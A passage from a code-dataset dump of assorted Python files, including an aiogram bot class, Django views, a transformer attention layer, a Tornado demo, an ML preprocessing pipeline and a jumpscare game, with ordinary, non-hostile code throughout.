:obj:`aiogram.exceptions.TelegramApiError`\n \"\"\"\n\n return await api.make_request(await self.get_session(), self.server, self.__token, method, data, files,\n proxy=self.proxy, proxy_auth=self.proxy_auth, timeout=self.timeout, **kwargs)\n\n async def download_file(\n self,\n file_path: base.String,\n destination: Optional[Union[base.InputFile, pathlib.Path]] = None,\n timeout: Optional[base.Integer] = sentinel,\n chunk_size: Optional[base.Integer] = 65536,\n seek: Optional[base.Boolean] = True,\n destination_dir: Optional[Union[str, pathlib.Path]] = None,\n make_dirs: Optional[base.Boolean] = True,\n ) -> Union[io.BytesIO, io.FileIO]:\n \"\"\"\n Download file by file_path to destination file or directory\n\n if You want to automatically create destination (:class:`io.BytesIO`) use default\n value of destination and handle result of this method.\n\n At most one of these parameters can be used: :param destination:, :param destination_dir:\n\n :param file_path: file path on telegram server (You can get it from :obj:`aiogram.types.File`)\n :type file_path: :obj:`str`\n :param destination: filename or instance of :class:`io.IOBase`. For e. g. :class:`io.BytesIO`\n :param timeout: Integer\n :param chunk_size: Integer\n :param seek: Boolean - go to start of file when downloading is finished.\n :param destination_dir: directory for saving files\n :param make_dirs: Make dirs if not exist\n :return: destination\n \"\"\"\n if destination and destination_dir:\n raise ValueError(\n \"Use only one of the parameters:destination or destination_dir.\"\n )\n\n if destination is None and destination_dir is None:\n destination = io.BytesIO()\n\n elif destination_dir:\n destination = os.path.join(destination_dir, file_path)\n\n if make_dirs and not isinstance(destination, io.IOBase) and os.path.dirname(destination):\n os.makedirs(os.path.dirname(destination), exist_ok=True)\n\n url = self.get_file_url(file_path)\n\n dest = destination if isinstance(destination, io.IOBase) else open(destination, 'wb')\n session = await self.get_session()\n async with session.get(\n url,\n timeout=timeout,\n proxy=self.proxy,\n proxy_auth=self.proxy_auth,\n raise_for_status=True,\n ) as response:\n while True:\n chunk = await response.content.read(chunk_size)\n if not chunk:\n break\n dest.write(chunk)\n dest.flush()\n if seek:\n dest.seek(0)\n return dest\n\n def get_file_url(self, file_path):\n return self.server.file_url(token=self.__token, path=file_path)\n\n async def send_file(self, file_type, method, file, payload) -> Union[Dict, base.Boolean]:\n \"\"\"\n Send file\n\n https://core.telegram.org/bots/api#inputfile\n\n :param file_type: field name\n :param method: API method\n :param file: String or io.IOBase\n :param payload: request payload\n :return: response\n \"\"\"\n if file is None:\n files = {}\n elif isinstance(file, str):\n # You can use file ID or URL in the most of requests\n payload[file_type] = file\n files = None\n else:\n files = {file_type: file}\n\n return await self.request(method, payload, files)\n\n @property\n def parse_mode(self):\n return getattr(self, '_parse_mode', None)\n\n @parse_mode.setter\n def parse_mode(self, value):\n if value is None:\n setattr(self, '_parse_mode', None)\n else:\n if not isinstance(value, str):\n raise TypeError(f\"Parse mode must be str, not {type(value)}\")\n value = value.lower()\n if value not in ParseMode.all():\n raise ValueError(f\"Parse mode must be one of {ParseMode.all()}\")\n setattr(self, '_parse_mode', value)\n if value == 'markdown':\n warnings.warn(\"Parse mode `Markdown` is legacy since Telegram Bot API 4.5, \"\n \"retained for backward compatibility. Use `MarkdownV2` instead.\\n\"\n \"https://core.telegram.org/bots/api#markdown-style\", stacklevel=3)\n\n @parse_mode.deleter\n def parse_mode(self):\n self.parse_mode = None\n\n @property\n def disable_web_page_preview(self):\n return getattr(self, '_disable_web_page_preview', None)\n\n @disable_web_page_preview.setter\n def disable_web_page_preview(self, value):\n if value is None:\n setattr(self, '_disable_web_page_preview', None)\n else:\n if not isinstance(value, bool):\n raise TypeError(f\"Disable web page preview must be bool, not {type(value)}\")\n setattr(self, '_disable_web_page_preview', value)\n\n @disable_web_page_preview.deleter\n def disable_web_page_preview(self):\n self.disable_web_page_preview = None\n\n def check_auth_widget(self, data):\n return check_integrity(self.__token, data)\n","repo_name":"prooxyyy/support-bot","sub_path":"venv/Lib/site-packages/aiogram/bot/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":13552,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"35"} +{"seq_id":"44511737426","text":"from django.http import HttpResponse, HttpResponseForbidden, HttpResponseRedirect\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.template import RequestContext\nfrom dsml import gdi\n# from rooms.models import Poll\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom models import *\nfrom views import *\nfrom django.core.urlresolvers import reverse\nfrom django.core.mail import send_mail\nfrom django import forms\nimport json\nimport sys,os\nimport traceback\n\nfrom simulation import start_sim, stop_sim, check_avail\nfrom queue import *\n\n\nREAL_TIME_ADDR='http://dev.rooms.tigerapps.org:8031'\nNORMAL_ADDR='http://dev.rooms.tigerapps.org'\nBASE_DOMAIN='rooms.tigerapps.org'\n\ndef externalResponse(data):\n response = HttpResponse(data)\n response['Access-Control-Allow-Origin'] = NORMAL_ADDR\n response['Access-Control-Allow-Credentials'] = \"true\"\n return response\n\n\ndef externalize(request, response):\n response['Access-Control-Allow-Credentials'] = \"true\"\n response['Access-Control-Allow-Origin'] = NORMAL_ADDR\n if 'HTTP_ORIGIN' in request.META:\n origin = request.META['HTTP_ORIGIN']\n if origin.find(BASE_DOMAIN) != -1:\n response['Access-Control-Allow-Origin'] = origin\n return response\n\ndef check_undergraduate(username):\n # Check if user can be here\n try:\n user = User.objects.get(netid=username)\n except:\n info = gdi(username)\n user = User(netid=username, firstname=info.get('givenName'), lastname=info.get('sn'), pustatus=info.get('pustatus'))\n if info.get('puclassyear'):\n user.puclassyear = int(info.get('puclassyear'))\n if user.pustatus == 'undergraduate' and 2011 < user.puclassyear:\n user.save()\n #Create queues for each draw\n for draw in Draw.objects.all():\n queue = Queue(draw=draw)\n queue.save()\n user.queues.add(queue)\n if user.pustatus == 'undergraduate' and 2011 < user.puclassyear:\n return user\n return None\n\n\n##################\n# Real-time view functions go here (long polling)\n \n@login_required\ndef update_queue(request, drawid):\n user = check_undergraduate(request.user.username)\n if not user:\n return externalResponse('forbidden')\n draw = Draw.objects.get(pk=drawid)\n qlist = json.loads(request.POST['queue'])\n # resp = ''\n # for r in qlist:\n # resp += ' ' + r;\n queue = user.queues.filter(draw=draw)[0]\n if not queue:\n return externalResponse('no queue')\n\n # QueueManager object takes over\n # rooms = []\n # for roomid in qlist:\n # room = Room.objects.get(pk=roomid)\n # if (not room) or not draw in room.building.draw.all():\n # return externalResponse('bad room/draw')\n # rooms.append(room)\n # # Clear out the old list\n # queue.queuetoroom_set.all().delete()\n # # Put in new relationships\n # for i in range(0, len(rooms)):\n # qtr = QueueToRoom(queue=queue, room=rooms[i], ranking=i)\n # qtr.save()\n # # Test output - list rooms\n # return externalResponse(rooms)\n try:\n return externalize(request, edit(user, queue, qlist, draw))\n except Exception as e:\n return externalResponse(e)\n\n# Ajax for displaying this user's queue\n@login_required\ndef get_queue(request, drawid, timestamp = 0):\n user = check_undergraduate(request.user.username)\n timestamp = int(timestamp)\n if not user:\n return externalResponse('no user')\n try:\n draw = Draw.objects.get(pk=drawid)\n queue = user.queues.get(draw=draw)\n except Exception as e:\n return externalResponse(traceback.format_exc(2) + str(draw))\n #real-time takes over\n# return externalResponse(queue)\n try:\n return externalize(request, check(user, queue, timestamp))\n except Exception as e:\n return externalResponse(traceback.format_exc(2))\n \n\n # queueToRooms = QueueToRoom.objects.filter(queue=queue).order_by('ranking')\n # if not queueToRooms:\n # return HttpResponse('')\n # room_list = []\n # for qtr in queueToRooms:\n # room_list.append(qtr.room)\n # return render_to_response('rooms/queue.html', {'room_list':room_list})\n\n\ndef start_simulation(request, delay, size=1):\n delay = int(delay)\n size = int(size)\n return start_sim(delay, size)\n\ndef stop_simulation(request):\n return stop_sim()\n\ndef check_availability(request, timestamp):\n return externalize(request, check_avail(int(timestamp)))\n","repo_name":"rclmenezes/USG-srv-dev","sub_path":"tigerapps/rooms/real_time_views.py","file_name":"real_time_views.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"31299474244","text":"#SHITTY CODE,ALE NIE CHCIALO MI SIE TE ZADANIE ROBIC LEPIEJ\n\ndef dayOfProgrammer(year):\n leap=0\n day=256\n if year==1918:\n day+=13\n if year<=1917:\n if year%4==0:\n leap=1\n else:\n if (year%400==0) or (year%4==0 and year%100!=0):\n leap=1\n days_from_start_to_month_end=(31,59,90,120,151,181,212,243,273,304,334,365)\n for position,month in enumerate(days_from_start_to_month_end):\n if day>=month and day= coins[j] and dp[i - coins[j]] != float(\"inf\"):\n dp[i] = min(dp[i - coins[j]] + 1, dp[i])\n\n if dp[amount] == float(\"inf\"):\n dp[amount] = -1\n return dp[amount]\n\n\nclass Solution1:\n def coinChange(self, coins: List[int], amount: int):\n dp = [float(\"inf\")] * (amount + 1)\n dp[0] = 0\n for j in range(len(coins)):\n for i in range(coins[j], amount + 1):\n dp[i] = min(dp[i - coins[j]] + 1, dp[i])\n if dp[amount] == float(\"inf\"):\n dp[amount] = -1\n return dp[amount]\n\n\nif __name__ == \"__main__\":\n arr, amount = [1, 2, 5], 11\n A = Solution1()\n print(A.coinChange(arr, amount))\n","repo_name":"wenhaoliang/leetcode","sub_path":"newcoder/动态规划/打印最少的硬币组合.py","file_name":"打印最少的硬币组合.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35479406101","text":"import math\nimport torch\nimport torch.nn as nn\n\n\nclass MultiHeadedAttention(nn.Module):\n \"\"\"\n Each head is a self-attention operation.\n self-attention refers to https://arxiv.org/pdf/1706.03762.pdf\n \"\"\"\n # hidden_size 隐层 特征大小\n # heads_num 头数\n # attention_head_size 每个头的 特征大小\n # with_scale : / sqrt(d)\n def __init__(self, hidden_size, heads_num, attention_head_size, dropout, has_bias=True, with_scale = True):\n super(MultiHeadedAttention, self).__init__()\n self.heads_num = heads_num\n\n self.per_head_size = attention_head_size\n self.with_scale = with_scale\n self.inner_hidden_size = heads_num * attention_head_size\n\n # 三个线性层 | 分别 对 QKV 进行 线性变换\n self.linear_layers = nn.ModuleList(\n [nn.Linear(hidden_size, self.inner_hidden_size, bias=has_bias) for _ in range(3)]\n )\n \n self.dropout = nn.Dropout(dropout)\n # 最后的线程性\n self.final_linear = nn.Linear(self.inner_hidden_size, hidden_size, bias=has_bias)\n\n # has_residual_attention 是否支持残差\n # prev_attn 上一次(层)的注意力 | 本次结果 与 上一层 结果 进行 残差\n\n def forward(self, key, value, query, mask, position_bias=None, has_residual_attention=False, prev_attn=None):\n \"\"\"\n Args:\n key: [batch_size x seq_length x hidden_size]\n value: [batch_size x seq_length x hidden_size]\n query: [batch_size x seq_length x hidden_size]\n mask: [batch_size x 1|多头 x seq_length x seq_length]\n position_bias: [1 x heads_num x seq_length x seq_length] # 位置 偏移 | 将加此值, 1为批次保留\n Returns:\n output: [batch_size x seq_length x hidden_size]\n \"\"\"\n batch_size, seq_length, _ = query.size()\n heads_num = self.heads_num\n per_head_size = self.per_head_size\n\n def shape(x):\n return x. \\\n contiguous(). \\\n view(batch_size, seq_length, heads_num, per_head_size). \\\n transpose(1, 2)\n\n def unshape(x):\n return x. \\\n transpose(1, 2). \\\n contiguous(). \\\n view(batch_size, seq_length, self.inner_hidden_size)\n\n\n # 对 QKV 进行 线性变换|影射\n # (batch_size, seq_length, hidden_size)\n # -> (batch_size, seq_length, inner_hidden_size)\n # -> (batch_size, seq_length, inner_hidden_size)\n\n query, key, value = [l(x). \\\n view(batch_size, -1, heads_num, per_head_size). \\\n transpose(1, 2) \\\n for l, x in zip(self.linear_layers, (query, key, value))\n ]\n\n scores = torch.matmul(query, key.transpose(-2, -1))\n if position_bias is not None:\n scores = scores + position_bias\n if self.with_scale:\n scores = scores / math.sqrt(float(per_head_size))\n\n # Mask 是 加 吗? | 为什么不是乘法 | 原因是 结果 要进行 Softmax 归一化时 -oo 会更有效果\n scores = scores + mask.type_as(scores)\n prev_attn_out = None\n if has_residual_attention: # residual 残差 attention\n if prev_attn is not None:\n scores += prev_attn\n prev_attn_out = scores\n probs = nn.Softmax(dim=-1)(scores)\n probs = self.dropout(probs)\n # (batch_size, heads_num, seq_length, per_head_size)\n # -> (batch_size, seq_length, heads_num, per_head_size) -> (batch_size, seq_length, heads_num * per_head_size)\n # -> (batch_size, seq_length, inner_hidden_size)\n output = unshape(torch.matmul(probs, value))\n\n # 对后进行处理\n output = self.final_linear(output)\n return output, prev_attn_out\n","repo_name":"KKinder82/UER-py","sub_path":"uer/layers/multi_headed_attn.py","file_name":"multi_headed_attn.py","file_ext":"py","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"111950500","text":"#--------------------------\n#Title: Specified size grid\n#Description: Print grids according to user's specifications\n#Original Dev: Lee Deitesfeld\n#Change Log:\n#20190331LAD Created function\n#--------------------------\n\ndef print_grid2(x, y):\n '''Prints grid according to user's size specifications (LxW).'''\n pipe = '|'\n spaces = ' '*y\n plus = '+'\n hyphens = '-'*y\n\n mult_hyphens = (plus + hyphens)*x\n mult_spaces = (pipe + spaces)*x\n\n #prints one line with hyphens and plus signs\n print(mult_hyphens + plus)\n\n #prints rest of grid\n for i in range(x):\n #prints multiple lines with pipes and spaces\n for i in range(y):\n print(mult_spaces + pipe)\n\n print(mult_hyphens + plus)\n","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/lee_deitesfeld/lesson02/print_grid2.py","file_name":"print_grid2.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"35286912276","text":"N = int(input())\n\nlista = []\nfor _ in range(N):\n posicoes = list(map(int, input().split()))\n lista.append(posicoes)\nprint(lista)\nfor s in range(N):\n lista1 = []\n for w in range(N):\n if w != s:\n resultado = ((lista[w][0] - lista[s][0]) ** 2 + (lista[w][1] - lista[s][1]) ** 2 + (lista[w][2] - lista[s][2]) ** 2) ** 0.5\n lista1.append(resultado)\n num = min(lista1)\n\n if num < 20:\n print('A')\n elif num >= 20 and num < 50:\n print('M')\n elif num >= 50:\n print('B')\n","repo_name":"Pedro-Edi/PEOO_2023","sub_path":"lista04B/exe7.py","file_name":"exe7.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19282090270","text":"from django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('contenttypes', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='BlacklistIP',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('ip', models.CharField(unique=True, max_length=40)),\n ],\n options={\n 'db_table': 'hitcount_blacklist_ip',\n 'verbose_name': 'Blacklisted IP',\n 'verbose_name_plural': 'Blacklisted IPs',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='BlacklistUserAgent',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('user_agent', models.CharField(unique=True, max_length=255)),\n ],\n options={\n 'db_table': 'hitcount_blacklist_user_agent',\n 'verbose_name': 'Blacklisted User Agent',\n 'verbose_name_plural': 'Blacklisted User Agents',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Hit',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', models.DateTimeField(auto_now_add=True, db_index=True)),\n ('ip', models.CharField(max_length=40, editable=False)),\n ('session', models.CharField(max_length=40, editable=False)),\n ('user_agent', models.CharField(max_length=255, editable=False)),\n ],\n options={\n 'ordering': ('-created',),\n 'get_latest_by': 'created',\n 'verbose_name': 'hit',\n 'verbose_name_plural': 'hits',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='HitCount',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('hits', models.PositiveIntegerField(default=0)),\n ('modified', models.DateTimeField(auto_now=True)),\n ('object_pk', models.PositiveIntegerField(verbose_name='object ID')),\n ('content_type', models.ForeignKey(related_name='content_type_set_for_hitcount',\n to='contenttypes.ContentType', on_delete=models.CASCADE)),\n ],\n options={\n 'get_latest_by': 'modified',\n 'ordering': ('-hits',),\n 'verbose_name_plural': 'hit counts',\n 'db_table': 'hitcount_hit_count',\n 'verbose_name': 'hit count',\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='hitcount',\n unique_together=('content_type', 'object_pk'),\n ),\n migrations.AddField(\n model_name='hit',\n name='hitcount',\n field=models.ForeignKey(editable=False, to='hitcount.HitCount', on_delete=models.CASCADE),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='hit',\n name='user',\n field=models.ForeignKey(editable=False, to=settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE),\n preserve_default=True,\n ),\n ]\n","repo_name":"thornomad/django-hitcount","sub_path":"hitcount/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":449,"dataset":"github-code","pt":"35"} +{"seq_id":"17699431430","text":"# Name: Moustafa Eid\n# Date: April 27th 2017\n# Class: ICS3U1-03\n# Description: Checks how many times a number is divisible by 2\n\n#Input to check for a number\nnum1 = int(input(\"Please enter a number: \"))\n\n#declaring variables\nnumout = num1\ncount = 0\n\n#While loop that checks if a number is divisible by 2 then checks if its quotient is also divisible by 2 \nwhile (True):\n if num1 % 2 == 0:\n num1 = num1 / 2\n count += 1\n else:\n break\n\n#Prints output for program\nprint (\"\\n%i is divisible by 2, %i times.\" % (numout, count))\n","repo_name":"Moustafa-Eid/Python-Programs","sub_path":"Unit 3/While loops/WhileLoopsEx4.py","file_name":"WhileLoopsEx4.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34351559005","text":"import pandas as pd\nimport numpy as np\nimport os,sys\nfrom mlpipeline.exception import CustomException\nfrom mlpipeline.logger import logging\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.impute import SimpleImputer\nfrom mlpipeline.config.configuration import ConfigurationManager\nfrom mlpipeline.entity.config_entity import DataTransformationConfig,DataIngestionConfig\nfrom mlpipeline.entity.artifact_entity import DataTransformationArtifact\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.compose import ColumnTransformer\nfrom mlpipeline.utils.common import save_object\nfrom mlpipeline.components.model_trainer import ModelTrainer\n\n\nclass DataTransformation:\n def __init__(self,data_transformation_config_info:DataTransformationConfig):\n try:\n self.data_transformation_config_info = data_transformation_config_info\n self.train_df = pd.read_csv(self.data_transformation_config_info.train_data_file)\n self.test_df = pd.read_csv(self.data_transformation_config_info.test_data_file)\n\n logging.info(f\"{'>>' * 10}Data Transformation log started.{'<<' * 10} \")\n except Exception as e:\n raise CustomException(e, sys) from e\n \n\n def get_data_transformation_obj(self):\n try:\n logging.info(\"Data Transformation Started\")\n numerical_features =['age', 'workclass', 'educational-num', 'marital-status', 'occupation',\n 'relationship', 'race', 'gender', 'capital-gain', 'capital-loss',\n 'hours-per-week']\n \n num_pipeline = Pipeline(\n steps=[\n (\"imputer\",SimpleImputer(strategy=\"median\")),\n (\"scaler\",StandardScaler())\n ]\n )\n \n preprocessor = ColumnTransformer([\n (\"NUm_pipeline\",num_pipeline,numerical_features)\n ])\n\n return preprocessor\n except Exception as e:\n raise CustomException(e,sys) from e\n \n def remove_outlier_IQR(self,col,df):\n try:\n Q1 = df[col].quantile(0.25)\n Q3 = df[col].quantile(0.75)\n\n iqr = Q3-Q1\n\n upper_limit = Q3+1.5*iqr\n lower_limit = Q1-1.5*iqr\n\n df.loc[(df[col]>upper_limit),col] = upper_limit\n df.loc[(df[col]DataTransformationArtifact:\n\n try:\n data_transformation_config_info = self.data_transformation_config_info\n train_data = pd.read_csv(self.data_transformation_config_info.train_data_file)\n test_data = pd.read_csv(self.data_transformation_config_info.test_data_file)\n\n numerical_features =['age', 'workclass', 'educational-num', 'marital-status', 'occupation',\n 'relationship', 'race', 'gender', 'capital-gain', 'capital-loss',\n 'hours-per-week']\n \n for col in numerical_features:\n self.remove_outlier_IQR(col= col ,df = train_data)\n logging.info(\"Outliers on our train data\")\n\n for col in numerical_features: \n self.remove_outlier_IQR(col= col ,df = test_data)\n logging.info(\"Outliers on our test data\")\n\n preprocess_obj = self.get_data_transformation_obj()\n\n target_columns = \"income\"\n drop_columns = [target_columns]\n\n logging.info(\"Splitting data into dependent and independent features\")\n input_feature_train_data = train_data.drop(target_columns,axis=1)\n target_feature_train_data = train_data[target_columns]\n\n input_feature_test_data = test_data.drop(target_columns,axis=1)\n target_feature_test_data = test_data[target_columns]\n\n input_train_arr = preprocess_obj.fit_transform(input_feature_train_data)\n input_test_arr = preprocess_obj.transform(input_feature_test_data)\n\n train_array = np.c_[input_train_arr,np.array(target_feature_train_data)]\n test_array = np.c_[input_test_arr,np.array(target_feature_test_data)]\n\n preprocessing_obj_path = data_transformation_config_info.preprocessed_object_file_path\n\n\n logging.info(\"Saving the pickle file\")\n save_object(file_path = self.data_transformation_config_info.preprocessed_object_file_path,obj=preprocess_obj)\n\n data_transformation_artifact = DataTransformationArtifact(preprocessed_object_path=preprocessing_obj_path)\n\n return(train_array,test_array,self.data_transformation_config_info.preprocessed_object_file_path)\n #return data_transformation_artifact\n \n \n except Exception as e:\n raise CustomException(e,sys) from e\n \n\n#if __name__ == \"__main__\":\n #config = ConfigurationManager(config_file_path=\"configs\\config.yaml\")\n #data_ingestion_config_info = config.get_data_ingestion_config()\n #data_transformation_config = config.get_data_transformation_config(data_ingestion_config=data_ingestion_config_info)\n #data_transformation = DataTransformation(data_transformation_config_info=data_transformation_config)\n #data_transformation_response = data_transformation.inititate_data_transformation()\n\n #modeltrainer = ModelTrainer()\n #print(modeltrainer.initiate_model_trainer())\n","repo_name":"ARPITA-ds/ml_pipeline_project","sub_path":"src/mlpipeline/components/data_transformation.py","file_name":"data_transformation.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72719071781","text":"'''\n该文件同步模拟的服务的被调用方 ,端口为: 8002\n'''\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport time\nfrom tornado.options import define, options\n\ndefine('port', default=8002, help='run port', type=int)\n\n\nclass SyncHandler(tornado.web.RequestHandler):\n def get(self):\n time.sleep(3)\n self.write(\"同步代码\")\n\n\nif __name__ == '__main__':\n tornado.options.parse_command_line()\n\n app = tornado.web.Application(\n handlers=[\n (r'/sync', SyncHandler),\n ],\n template_path='templates',\n static_path='static',\n debug=True,\n )\n app.db = {}\n print(\"端口:\", options.port)\n app.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n","repo_name":"zzb15997937197/tornado-study","sub_path":"base_study/web/gen/sync_exp/demo02.py","file_name":"demo02.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"20196593309","text":"from tkinter import *\r\nfrom PIL import Image, ImageTk\r\nfrom pygame import mixer\r\nfrom attack import Jumpscare\r\n\r\nmain_jump = Tk()\r\nmain_jump.title('СИМУЛЯТОР СКРИМЕРОВ')\r\nmain_jump.geometry('1920x1080')\r\nmain_jump.resizable(False, False)\r\n\r\nmixer.init(channels=2)\r\n\r\nimg = ImageTk.PhotoImage(Image.open('cams/images/cam03b/cam03b.jpg'))\r\nimg1 = ImageTk.PhotoImage(Image.open('animatronics/strange_bunny2.png'))\r\n\r\ntalking = 'Какой же ты всё-таки наивный.\\nНу сломал ты аниматроников, и что теперь?\\n' \\\r\n 'Ну документы нашёл, отдал их полиции.\\nВот только она тебя не спасёт.\\n' \\\r\n 'Она нас покрывает, понимаешь?\\nПокрывает всю Fazbear Entertainment!\\n' \\\r\n 'И пусть прошло много времени с тех пор, как я застрял в этом костюме зайца с пружинами, ничего ' \\\r\n 'не изменилось.\\nВообще. И поэтому я хочу, чтобы знал, КТО Я ТАКОЙ.\\n' \\\r\n 'Я Уильям Афтон, создатель аниматроников.\\nЯ всегда возвращаюсь. Я ВСЕГДА ОСТАЮСЬ.\\n'\r\n\r\ncanvas = Canvas(bg='black', width=1920, height=1080)\r\ncanvas.pack()\r\ncanvas.create_image(0, 0, image=img, anchor='nw')\r\n\r\n\r\ndef summon_freddy():\r\n jump = Toplevel()\r\n jump.title('СМЕРТЬ')\r\n jump.geometry('1920x1080')\r\n jump.resizable(False, False)\r\n\r\n anim = Jumpscare(jump)\r\n anim.pack()\r\n anim.load('jumpscares/freddy_jumpscare.gif')\r\n\r\n jump_sound = mixer.Sound('sounds/jumpscares/jumpscare_default.wav')\r\n mixer.Channel(1).play(jump_sound)\r\n\r\n def no_salvation():\r\n pass\r\n\r\n jump.protocol('WM_DELETE_WINDOW', no_salvation)\r\n\r\n jump.after(5000, jump.destroy)\r\n\r\n\r\ndef summon_bonnie():\r\n jump = Toplevel()\r\n jump.title('СМЕРТЬ')\r\n jump.geometry('1920x1080')\r\n jump.resizable(False, False)\r\n\r\n anim = Jumpscare(jump)\r\n anim.pack()\r\n anim.load('jumpscares/bonnie_jumpscare.gif')\r\n\r\n jump_sound = mixer.Sound('sounds/jumpscares/jumpscare_default.wav')\r\n mixer.Channel(1).play(jump_sound)\r\n\r\n def no_salvation():\r\n pass\r\n\r\n jump.protocol('WM_DELETE_WINDOW', no_salvation)\r\n\r\n jump.after(5000, jump.destroy)\r\n\r\n\r\ndef summon_chica():\r\n jump = Toplevel()\r\n jump.title('СМЕРТЬ')\r\n jump.geometry('1920x1080')\r\n jump.resizable(False, False)\r\n\r\n anim = Jumpscare(jump)\r\n anim.pack()\r\n anim.load('jumpscares/chica_jumpscare.gif')\r\n\r\n jump_sound = mixer.Sound('sounds/jumpscares/jumpscare_default.wav')\r\n mixer.Channel(1).play(jump_sound)\r\n\r\n def no_salvation():\r\n pass\r\n\r\n jump.protocol('WM_DELETE_WINDOW', no_salvation)\r\n\r\n jump.after(5000, jump.destroy)\r\n\r\n\r\ndef summon_foxy():\r\n jump = Toplevel()\r\n jump.title('СМЕРТЬ')\r\n jump.geometry('1920x1080')\r\n jump.resizable(False, False)\r\n\r\n anim = Jumpscare(jump)\r\n anim.pack()\r\n anim.load('jumpscares/foxy_jumpscare.gif')\r\n\r\n jump_sound = mixer.Sound('sounds/jumpscares/jumpscare_default.wav')\r\n mixer.Channel(1).play(jump_sound)\r\n\r\n def no_salvation():\r\n pass\r\n\r\n jump.protocol('WM_DELETE_WINDOW', no_salvation)\r\n\r\n jump.after(5000, jump.destroy)\r\n\r\n\r\ndef what():\r\n spring_jump = Toplevel()\r\n spring_jump.title('???')\r\n spring_jump.geometry('1920x1080')\r\n spring_jump.resizable(False, False)\r\n\r\n canv = Canvas(spring_jump, bg='black', width=1920, height=1080)\r\n canv.pack()\r\n\r\n\r\n def talk():\r\n canv.create_text(960, 165, text=talking, fill='#FF00FF', font='Times 20')\r\n\r\n\r\n spring_sound = mixer.Sound('sounds/jumpscares/jumpscare_spring.wav')\r\n mixer.Channel(0).play(spring_sound)\r\n\r\n canv.create_image(0, 0, image=img1, anchor='nw')\r\n spring_jump.after(2000, talk)\r\n\r\n\r\n def no_salvation():\r\n pass\r\n\r\n\r\n spring_jump.protocol('WM_DELETE_WINDOW', no_salvation)\r\n\r\n spring_jump.after(20000, main_jump.destroy)\r\n\r\n\r\nfred_button = Button(canvas, text='Фредди', bg='#593720', fg='white', command=summon_freddy)\r\nfred_button.place(x=1440, y=75)\r\n\r\nbonn_button = Button(canvas, text='Бонни', bg='#423e54', fg='white', command=summon_bonnie)\r\nbonn_button.place(x=480, y=75)\r\n\r\nchic_button = Button(canvas, text='Чика', bg='#b3923c', fg='white', command=summon_chica)\r\nchic_button.place(x=960, y=75)\r\n\r\nfox_button = Button(canvas, text='Фокси', bg='#a4352e', fg='white', command=summon_foxy)\r\nfox_button.place(x=955, y=125)\r\n\r\nwhat_button = Button(canvas, text='???', bg='#393611', fg='white', command=what)\r\nwhat_button.place(x=955, y=300)\r\n\r\nambience = mixer.Sound('sounds/ambience2.wav')\r\nmixer.Channel(0).play(ambience, loops=-1)\r\n\r\nmain_jump.mainloop()\r\n","repo_name":"Vovan4ikYT/frede","sub_path":"mshkfrede/jump_simulator.py","file_name":"jump_simulator.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39098155469","text":"from head_angle_w_mag import *\n\n\ndef run():\n startTime = 550000\n endTime = 800000\n\n gliderTimeCutData = prepareGliderGyroData(dev_glider, glider_neutral_acc_vector, glider_gyro_calibration_vector,\n startTime, endTime)\n headTimeCutData = prepareGliderGyroData(dev_head, head_neutral_acc_vector, head_gyro_calibration_vector,\n startTime, endTime)\n headMagData = prepare_magnetometer_data_orientated(dev_head, head_neutral_acc_vector, startTime, endTime)\n\n gliderInterpolatedData = interpolateDatas(gliderTimeCutData, headTimeCutData)\n headInterpolatedData = interpolateDatas(headTimeCutData, gliderTimeCutData)\n\n gliderAngleData = cumulateZAxisData(gliderInterpolatedData)\n headAngleData = cumulateZAxisData(headInterpolatedData)\n\n headRelativeAngle = getHeadRelativeAngle(headInterpolatedData, gliderInterpolatedData)\n\n plotAll(headAngleData, gliderAngleData, headRelativeAngle, 